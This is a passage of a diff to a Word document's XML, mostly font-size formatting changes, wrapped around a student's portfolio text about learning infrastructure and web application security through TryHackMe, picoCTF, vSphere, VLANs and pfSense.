+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747835 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>20</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -825,6 +1475,8 @@
           <w:pPr>
             <w:rPr>
               <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -833,6 +1485,8 @@
               <w:b/>
               <w:bCs/>
               <w:noProof/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
             <w:fldChar w:fldCharType="end"/>
           </w:r>
@@ -843,202 +1497,152 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -1047,13 +1651,18 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc113407010"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Toc113747821"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
-        </w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>INTRODUCTION</w:t>
       </w:r>
       <w:bookmarkEnd w:id="0"/>
@@ -1140,12 +1749,16 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc113407011"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Toc113747822"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>IT Background</w:t>
       </w:r>
@@ -1155,11 +1768,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:tab/>
         <w:t>I only studied infrastructure engineering for 10 weeks in my first semester at Fontys</w:t>
@@ -1167,6 +1784,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">. I felt like this was not going to be enough to become at a high-level student. Therefore, I decided to invest all my summer breaks studying new things that are related to infrastructure. </w:t>
       </w:r>
@@ -1175,11 +1794,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">For instance, I subscribed to </w:t>
       </w:r>
@@ -1188,6 +1811,8 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
           </w:rPr>
           <w:t>www.tryhackme.com</w:t>
         </w:r>
@@ -1195,6 +1820,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">, a website that provides a huge amount of IT courses. I finished all the fundamentals for Linux, windows, and online databases. </w:t>
       </w:r>
@@ -1202,6 +1829,8 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DAE3F31" wp14:editId="438B38F2">
@@ -1257,11 +1886,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">This picture shows some of the rooms that I enrolled for. I finished most of them with so much information gained. </w:t>
       </w:r>
@@ -1270,11 +1903,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>I also like to learn by watching sometimes. I am subscribed to so many IT YouTube channels that provide basics for the IT industry. Some of my favorite YouTube channels are</w:t>
       </w:r>
@@ -1288,6 +1925,8 @@
         </w:numPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:hyperlink r:id="rId10" w:history="1">
@@ -1295,6 +1934,8 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
           </w:rPr>
           <w:t>https://www.youtube.com/c/PowerCertAnimatedVideos</w:t>
         </w:r>
@@ -1309,6 +1950,8 @@
         </w:numPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:hyperlink r:id="rId11" w:history="1">
@@ -1316,6 +1959,8 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
           </w:rPr>
           <w:t>https://www.youtube.com/c/H</w:t>
         </w:r>
@@ -1325,11 +1970,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">What I realized after all the tutorials that I have been to is that I prefer reading rather than watching tutorials. As the visual tutorials usually do not give me the chance to do things myself. On the other side, services like TryHackMe, Fontys are more practical that I found myself enjoy it more. </w:t>
       </w:r>
@@ -1338,6 +1987,8 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -1346,24 +1997,33 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc113407012"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc113747823"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
-        </w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>BOK)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> Web Application Security (week 1-4)</w:t>
       </w:r>
@@ -1373,25 +2033,33 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-        <w:t>(</w:t>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">First day was a refresher to warm up ourselves. We made groups and competed by getting more points. The website name was </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>picoCTF</w:t>
       </w:r>
@@ -1399,19 +2067,33 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> that </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gives you points by solving technical problems. The more you solve the more your group gets.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>The second day, I attended the networking refresh. We learned about vSphere and how to set up a local virtual network. I thought that we would need to borrow some routers and devices to set up local network. However, the VLAN concept really changed the way I see internet. I managed to design a local network that includes 2 firewalls, workstation, DMZ, and the WAN to access the internet.</w:t>
       </w:r>
@@ -1420,11 +2102,24 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Here is a picture of my simple design:</w:t>
       </w:r>
@@ -1433,12 +2128,16 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5695CF31" wp14:editId="0E17B40A">
@@ -1494,11 +2193,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">I had to learn </w:t>
       </w:r>
@@ -1506,6 +2209,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>pfSense</w:t>
       </w:r>
@@ -1513,6 +2218,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> to set up this network and some of Docker basics.</w:t>
       </w:r>
@@ -1521,11 +2228,15 @@
       <w:pPr>
         <w:rPr>
